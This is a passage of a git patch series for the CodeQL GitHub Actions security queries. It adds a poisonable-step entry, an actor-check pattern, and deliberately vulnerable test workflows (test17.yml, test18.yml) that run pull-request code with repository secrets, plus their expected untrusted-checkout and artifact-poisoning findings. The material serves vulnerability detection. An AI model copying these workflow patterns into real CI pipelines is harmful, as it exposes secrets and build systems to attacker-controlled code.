timeout-minutes: 2 # 2022-08-26: Seems like it should be fast. + outputs: + zip_url: ${{ steps.run.outputs.zip_url }} + any_plugins: ${{ steps.run.outputs.any_plugins }} + steps: + - uses: actions/checkout@v4 + + - name: Find artifact + id: run + env: + TOKEN: ${{ github.token }} + URL: ${{ github.event.workflow_run.artifacts_url }} + run: | + for (( i=1; i<=5; i++ )); do + [[ $i -gt 1 ]] && sleep 10 + echo "::group::Fetch list of artifacts (attempt $i/5)" + JSON="$(curl -v -L --get \ + --header "Authorization: token $TOKEN" \ + --url "$URL" + )" + echo "$JSON" + echo "::endgroup::" + ZIPURL="$(jq -r '.artifacts | map( select( .name == "jetpack-build" ) ) | sort_by( .created_at ) | last | .archive_download_url // empty' <<<"$JSON")" + PLUGINS="$(jq -r '.artifacts[] | select( .name == "plugins.tsv" )' <<<"$JSON")" + if [[ -n "$ZIPURL" ]]; then + break + fi + done + [[ -z "$ZIPURL" ]] && { echo "::error::Failed to find artifact."; exit 1; } + echo "Zip URL: $ZIPURL" + echo "zip_url=${ZIPURL}" >> "$GITHUB_OUTPUT" + if [[ -z "$PLUGINS" ]]; then + echo "Any plugins? No" + echo "any_plugins=false" >> "$GITHUB_OUTPUT" + else + echo "Any plugins? Yes" + echo "any_plugins=true" >> "$GITHUB_OUTPUT" + fi + + - name: Get token + id: get_token + if: ${{ ! success() }} + uses: ./.github/actions/gh-app-token + with: + app_id: ${{ secrets.JP_LAUNCH_CONTROL_ID }} + private_key: ${{ secrets.JP_LAUNCH_CONTROL_KEY }} + - name: 'Mark "Test plugin upgrades" failed' + if: ${{ ! success() }} + uses: ./.github/actions/check-run + with: + id: ${{ needs.setup.outputs.upgrade_check }} + conclusion: failure + title: Failed to find build artifact + summary: | + ${{ env.SUMMARY }} + + Post-build run aborted because the "Find artifact" step failed. + token: ${{ steps.get_token.outputs.token }} + + no_plugins: + name: Handle no-plugins + runs-on: ubuntu-latest + needs: [ setup, find_artifact ] + if: needs.find_artifact.outputs.any_plugins == 'false' + timeout-minutes: 2 # 2022-08-26: Seems like it should be fast. + steps: + - uses: actions/checkout@v4 + + - name: Get token + id: get_token + uses: ./.github/actions/gh-app-token + with: + app_id: ${{ secrets.JP_LAUNCH_CONTROL_ID }} + private_key: ${{ secrets.JP_LAUNCH_CONTROL_KEY }} + + - name: 'Mark "Test plugin upgrades" skipped' + uses: ./.github/actions/check-run + with: + id: ${{ needs.setup.outputs.upgrade_check }} + conclusion: skipped + title: No plugins were built + summary: | + ${{ env.SUMMARY }} + + Post-build run skipped because no plugins were built. + token: ${{ steps.get_token.outputs.token }} + + upgrade_test: + name: Test plugin upgrades + runs-on: ubuntu-latest + needs: [ setup, find_artifact ] + if: needs.find_artifact.outputs.any_plugins == 'true' + timeout-minutes: 15 # 2022-08-26: Successful runs seem to take about 6 minutes, but give some extra time for the downloads. + services: + db: + image: mariadb:lts + env: + MARIADB_ROOT_PASSWORD: wordpress + ports: + - 3306:3306 + options: --health-cmd="healthcheck.sh --su-mysql --connect --innodb_initialized" --health-interval=10s --health-timeout=5s --health-retries=5 + container: + image: ghcr.io/automattic/jetpack-wordpress-dev:latest + env: + WP_DOMAIN: localhost + WP_ADMIN_USER: wordpress + WP_ADMIN_EMAIL: wordpress@example.com + WP_ADMIN_PASSWORD: wordpress + WP_TITLE: Hello World + MYSQL_HOST: db:3306 + MYSQL_DATABASE: wordpress + MYSQL_USER: root + MYSQL_PASSWORD: wordpress + HOST_PORT: 80 + ports: + - 80:80 + steps: + - uses: actions/checkout@v4 + with: + path: trunk + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.workflow_run.head_commit.id }} + path: commit + + - name: Get token + id: get_token + uses: ./trunk/.github/actions/gh-app-token + env: + # Work around a weird node 16/openssl 3 issue in the docker env + OPENSSL_CONF: '/dev/null' + with: + app_id: ${{ secrets.JP_LAUNCH_CONTROL_ID }} + private_key: ${{ secrets.JP_LAUNCH_CONTROL_KEY }} + + - name: Notify check in progress + uses: ./trunk/.github/actions/check-run + with: + id: ${{ needs.setup.outputs.upgrade_check }} + status: in_progress + title: Test started... + summary: | + ${{ env.SUMMARY }} + + See run [#${{ github.run_id }}](${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}) for details. + token: ${{ steps.get_token.outputs.token }} + + - name: Download build artifact + env: + TOKEN: ${{ github.token }} + ZIPURL: ${{ needs.find_artifact.outputs.zip_url }} + shell: bash + run: | + for (( i=1; i<=2; i++ )); do + [[ $i -gt 1 ]] && sleep 10 + echo "::group::Downloading artifact (attempt $i/2)" + curl -v -L --get \ + --header "Authorization: token $TOKEN" \ + --url "$ZIPURL" \ + --output "artifact.zip" + echo "::endgroup::" + if [[ -e "artifact.zip" ]] && zipinfo artifact.zip &>/dev/null; then + break + fi + done + [[ ! -e "artifact.zip" ]] && { echo "::error::Failed to download artifact."; exit 1; } + unzip artifact.zip + tar --xz -xvvf build.tar.xz build + + - name: Setup WordPress + run: trunk/.github/files/test-plugin-update/setup.sh + + - name: Prepare plugin zips + id: zips + run: trunk/.github/files/test-plugin-update/prepare-zips.sh + + - name: Test upgrades + id: tests + run: trunk/.github/files/test-plugin-update/test.sh + + - name: Notify final status + if: always() + uses: ./trunk/.github/actions/check-run + with: + id: ${{ needs.setup.outputs.upgrade_check }} + conclusion: ${{ job.status }} + title: ${{ job.status == 'success' && 'Tests passed' || job.status == 'cancelled' && 'Cancelled' || 'Tests failed' }} + summary: | + ${{ env.SUMMARY }} + + ${{ steps.zips.outputs.info }}${{ steps.tests.outputs.info }} + + See run [#${{ github.run_id }}](${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}) for details. + token: ${{ steps.get_token.outputs.token }} diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 2a401dee18a..2380236acca 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -244,6 +244,24 @@ edges | .github/workflows/test15.yml:236:7:242:4 | Run Step | .github/workflows/test15.yml:242:7:250:4 | Uses Step | | .github/workflows/test15.yml:242:7:250:4 | Uses Step | .github/workflows/test15.yml:250:7:270:4 | Uses Step | | .github/workflows/test15.yml:250:7:270:4 | Uses Step | .github/workflows/test15.yml:270:7:271:45 | Run Step | +| .github/workflows/test16.yml:43:9:47:6 | Run Step | .github/workflows/test16.yml:47:9:49:6 | Uses Step | +| .github/workflows/test16.yml:47:9:49:6 | Uses Step | .github/workflows/test16.yml:49:9:56:6 | Uses Step: get_token | +| .github/workflows/test16.yml:49:9:56:6 | Uses Step: get_token | .github/workflows/test16.yml:56:9:68:2 | Uses Step: upgrade_check | +| .github/workflows/test16.yml:75:9:77:6 | Uses Step | .github/workflows/test16.yml:77:9:84:6 | Uses Step: get_token | +| .github/workflows/test16.yml:77:9:84:6 | Uses Step: get_token | .github/workflows/test16.yml:84:9:96:2 | Uses Step | +| .github/workflows/test16.yml:106:9:108:6 | Uses Step | .github/workflows/test16.yml:108:9:140:6 | Run Step: run | +| .github/workflows/test16.yml:108:9:140:6 | Run Step: run | .github/workflows/test16.yml:140:9:147:6 | Uses Step: get_token | +| .github/workflows/test16.yml:140:9:147:6 | Uses Step: get_token | .github/workflows/test16.yml:147:9:160:2 | Uses Step | +| .github/workflows/test16.yml:167:9:169:6 | Uses Step | .github/workflows/test16.yml:169:9:176:6 | Uses Step: get_token | +| .github/workflows/test16.yml:169:9:176:6 | Uses Step: get_token | .github/workflows/test16.yml:176:9:188:2 | Uses Step | +| .github/workflows/test16.yml:218:9:221:6 | Uses Step | .github/workflows/test16.yml:221:9:226:6 | Uses Step | +| .github/workflows/test16.yml:221:9:226:6 | Uses Step | .github/workflows/test16.yml:226:9:236:6 | Uses Step: get_token | +| .github/workflows/test16.yml:226:9:236:6 | Uses Step: get_token | .github/workflows/test16.yml:236:9:248:6 | Uses Step | +| .github/workflows/test16.yml:236:9:248:6 | Uses Step | .github/workflows/test16.yml:248:9:270:6 | Run Step | +| .github/workflows/test16.yml:248:9:270:6 | Run Step | .github/workflows/test16.yml:270:9:273:6 | Run Step | +| .github/workflows/test16.yml:270:9:273:6 | Run Step | .github/workflows/test16.yml:273:9:277:6 | Run Step: zips | +| .github/workflows/test16.yml:273:9:277:6 | Run Step: zips | .github/workflows/test16.yml:277:9:281:6 | Run Step: tests | +| .github/workflows/test16.yml:277:9:281:6 | Run Step: tests | .github/workflows/test16.yml:281:9:294:54 | Uses Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | From fc5a6703b34b5e50d72a670886d6af900a994ab8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 19 Oct 2024 17:01:47 +0200 Subject: [PATCH 0602/1267] Add github.event.sender.login as an Actor source --- ql/lib/codeql/actions/security/ControlChecks.qll | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 760efaf5e7e..6293e4d6f3d 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -179,7 +179,8 @@ class ActorIfCheck extends ActorCheck instanceof If { .regexpFind([ "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", "\\bgithub\\.event\\.head_commit\\.author\\.name\\b", - "\\bgithub\\.event\\.commits.*\\.author\\.name\\b" + "\\bgithub\\.event\\.commits.*\\.author\\.name\\b", + "\\bgithub\\.event\\.sender\\.login\\b" ], _, _) ) or From 229d42b51516df3a59a5aa600640282b4b7d3d8c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 21 Oct 2024 11:05:06 +0200 Subject: [PATCH 0603/1267] Add sonar-scanner-action as a poisonable step --- ql/lib/ext/config/poisonable_steps.yml | 1 + .../CWE-829/.github/workflows/test17.yml | 23 +++++++++++ .../CWE-829/.github/workflows/test18.yml | 41 +++++++++++++++++++ .../ArtifactPoisoningCritical.expected | 4 ++ .../CWE-829/ArtifactPoisoningMedium.expected | 3 ++ .../CWE-829/UnpinnedActionsTag.expected | 2 + .../UntrustedCheckoutCritical.expected | 4 ++ 7 files changed, 78 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index addadd75c87..2ee9af6904e 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -10,6 +10,7 @@ extensions: - ["ruby/setup-ruby"] - ["actions/jekyll-build-pages"] - ["qcastel/github-actions-maven/actions/maven"] + - ["sonarsource/sonarcloud-github-action"] - addsTo: pack: github/actions-all extensible: poisonableCommandsDataModel diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml new file mode 100644 index 00000000000..f679b772e34 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml @@ -0,0 +1,23 @@ +name: Sonar +on: + workflow_run: + workflows: [PR Build] + types: [completed] +jobs: + sonar: + runs-on: ubuntu-latest + timeout-minutes: 30 + if: github.event.workflow_run.conclusion == 'success' + steps: + - name: Checkout PR code + uses: actions/checkout@v3 + with: + repository: ${{ github.event.workflow_run.head_repository.full_name }} + ref: ${{ github.event.workflow_run.head_branch }} + fetch-depth: 0 + + - name: SonarCloud Scan + uses: sonarsource/sonarcloud-github-action@master + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml new file mode 100644 index 00000000000..6347db51e3c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml @@ -0,0 +1,41 @@ +name: Sonar +on: + workflow_run: + workflows: [PR Build] + types: [completed] +jobs: + sonar: + runs-on: ubuntu-latest + timeout-minutes: 30 + if: github.event.workflow_run.conclusion == 'success' + steps: + - name: Download artifacts + uses: actions/github-script@v6 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "rsc-pr-build-artifacts" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/rsc-pr-build-artifacts.zip`, Buffer.from(download.data)); + + - name: Unzip artifacts + run: unzip rsc-pr-build-artifacts.zip + + - name: SonarCloud Scan + uses: sonarsource/sonarcloud-github-action@master + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} + diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index 5c784595dbe..53b14ee7b50 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected @@ -14,6 +14,7 @@ edges | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | Config | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | Config | | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | provenance | Config | +| .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | provenance | Config | nodes | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | @@ -44,6 +45,8 @@ nodes | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | semmle.label | make snapshot | | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | semmle.label | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | +| .github/workflows/test18.yml:12:15:33:12 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test18.yml:36:15:40:58 | Uses Step | semmle.label | Uses Step | subpaths #select | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | @@ -61,3 +64,4 @@ subpaths | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Uses Step | | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | make snapshot | | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | +| .github/workflows/test18.yml:36:15:40:58 | Uses Step | .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index e6108dddd2a..49cee7772c0 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected @@ -14,6 +14,7 @@ edges | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | Config | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | Config | | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | provenance | Config | +| .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | provenance | Config | nodes | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | @@ -44,5 +45,7 @@ nodes | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | semmle.label | make snapshot | | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | semmle.label | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | +| .github/workflows/test18.yml:12:15:33:12 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test18.yml:36:15:40:58 | Uses Step | semmle.label | Uses Step | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index d05c7bebc07..58a000efac4 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -29,4 +29,6 @@ | .github/workflows/pr-workflow.yml:453:15:453:41 | cachix/cachix-action@master | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/cachix-action' with ref 'master', not a pinned commit hash | .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | Uses Step | | .github/workflows/test7.yml:25:15:25:34 | pnpm/action-setup@v3 | Unpinned 3rd party Action 'Benchmark' step $@ uses 'pnpm/action-setup' with ref 'v3', not a pinned commit hash | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Uses Step | | .github/workflows/test13.yml:15:13:15:53 | sushichop/action-repository-permission@v2 | Unpinned 3rd party Action 'test13.yml' step $@ uses 'sushichop/action-repository-permission' with ref 'v2', not a pinned commit hash | .github/workflows/test13.yml:14:7:20:4 | Uses Step | Uses Step | +| .github/workflows/test17.yml:20:21:20:63 | sonarsource/sonarcloud-github-action@master | Unpinned 3rd party Action 'Sonar' step $@ uses 'sonarsource/sonarcloud-github-action' with ref 'master', not a pinned commit hash | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Uses Step | +| .github/workflows/test18.yml:37:21:37:63 | sonarsource/sonarcloud-github-action@master | Unpinned 3rd party Action 'Sonar' step $@ uses 'sonarsource/sonarcloud-github-action' with ref 'master', not a pinned commit hash | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Uses Step | | .github/workflows/unpinned_tags.yml:10:13:10:22 | foo/bar@v1 | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 2380236acca..baf354179b3 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -262,6 +262,9 @@ edges | .github/workflows/test16.yml:270:9:273:6 | Run Step | .github/workflows/test16.yml:273:9:277:6 | Run Step: zips | | .github/workflows/test16.yml:273:9:277:6 | Run Step: zips | .github/workflows/test16.yml:277:9:281:6 | Run Step: tests | | .github/workflows/test16.yml:277:9:281:6 | Run Step: tests | .github/workflows/test16.yml:281:9:294:54 | Uses Step | +| .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | +| .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:33:15:36:12 | Run Step | +| .github/workflows/test18.yml:33:15:36:12 | Run Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | @@ -325,6 +328,7 @@ edges | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | | .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | .github/workflows/test10.yml | | .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test11.yml:5:3:5:15 | issue_comment | .github/workflows/test11.yml | +| .github/workflows/test17.yml:19:15:23:58 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test17.yml:3:5:3:16 | workflow_run | .github/workflows/test17.yml | | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | .github/workflows/untrusted_checkout3.yml | | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout4.yml:4:3:4:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout4.yml:4:3:4:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | From 6dbbfa967277211aba958b5a261ff5c767dddeef Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 21 Oct 2024 12:12:37 +0200 Subject: [PATCH 0604/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index e5471e23651..c908efa68f7 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.69 +version: 0.1.70 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 660f3287090..d2c2e26c361 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.69 +version: 0.1.70 groups: [actions, queries] suites: codeql-suites extractor: javascript From 023e8cbe3e00a1207d641f8f8139e942275b585d Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Mon, 21 Oct 2024 20:59:42 -0400 Subject: [PATCH 0605/1267] factor semver to separate function --- .../actions/security/UseOfUnversionedImmutableAction.qll | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll b/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll index 2be71612f26..3f65a2ffc72 100644 --- a/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll +++ b/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll @@ -6,6 +6,11 @@ class UnversionedImmutableAction extends UsesStep { UnversionedImmutableAction() { immutableActionsDataModel(immutable_action) and this.getCallee() = immutable_action and - not this.getVersion().regexpMatch("^(v)?[0-9]+(\\.[0-9]+)*(\\.[xX])?$") + isNotSemVer(this.getVersion()) } } + +bindingset[version] +predicate isNotSemVer(string version) { + not version.regexpMatch("^(v)?[0-9]+(\\.[0-9]+)*(\\.[xX])?$") +} From da10ee74d353765cd60180afc8899ff7038614cb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 22 Oct 2024 11:18:42 +0200 Subject: [PATCH 0606/1267] Add workflow_dispatch and scheduled to the list of privileged and external (user interaction) events --- .../codeql/actions/dataflow/FlowSources.qll | 5 +- .../security/UntrustedCheckoutQuery.qll | 38 +++++-- ql/lib/ext/config/context_event_map.yml | 2 - .../config/externally_triggereable_events.yml | 3 +- .../ext/config/untrusted_event_properties.yml | 3 - .../CWE-829/UntrustedCheckoutCritical.ql | 6 +- .../CWE-078/CommandInjectionCritical.expected | 7 -- .../CWE-078/CommandInjectionMedium.expected | 9 -- .../CWE-094/.github/workflows/test18.yml | 33 ++++++ .../CWE-094/CodeInjectionCritical.expected | 4 + .../CWE-094/CodeInjectionMedium.expected | 3 + .../CWE-829/.github/workflows/test19.yml | 22 ++++ .../CWE-829/.github/workflows/test20.yml | 22 ++++ .../.github/workflows/untrusted_checkout.yml | 18 +++- .../.github/workflows/untrusted_checkout4.yml | 49 --------- .../UntrustedCheckoutCritical.expected | 102 +++++++++--------- .../CWE-829/UntrustedCheckoutHigh.expected | 4 + .../CWE-829/UntrustedCheckoutMedium.expected | 4 - 18 files changed, 195 insertions(+), 139 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test19.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test20.yml diff --git 